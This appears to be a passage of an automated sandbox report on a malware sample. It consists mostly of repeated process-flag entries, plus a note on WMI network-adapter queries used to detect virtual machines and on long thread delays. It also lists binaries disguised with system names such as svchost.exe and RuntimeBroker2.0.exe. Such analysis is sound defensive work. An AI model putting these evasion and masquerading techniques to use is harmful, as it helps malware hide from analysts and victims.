Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter

Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Memory allocated: 1AD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Memory allocated: 1B9D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Memory allocated: 2227B980000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Memory allocated: 2227D4C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Memory allocated: CC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Memory allocated: 1A720000 memory reserve \| memory write watch
Source: C:\Users\user\cscript.exe	Memory allocated: 2AD0000 memory reserve \| memory write watch
Source: C:\Users\user\cscript.exe	Memory allocated: 1AB50000 memory reserve \| memory write watch
Source: C:\Users\user\cscript.exe	Memory allocated: 1180000 memory reserve \| memory write watch
Source: C:\Users\user\cscript.exe	Memory allocated: 1ABF0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
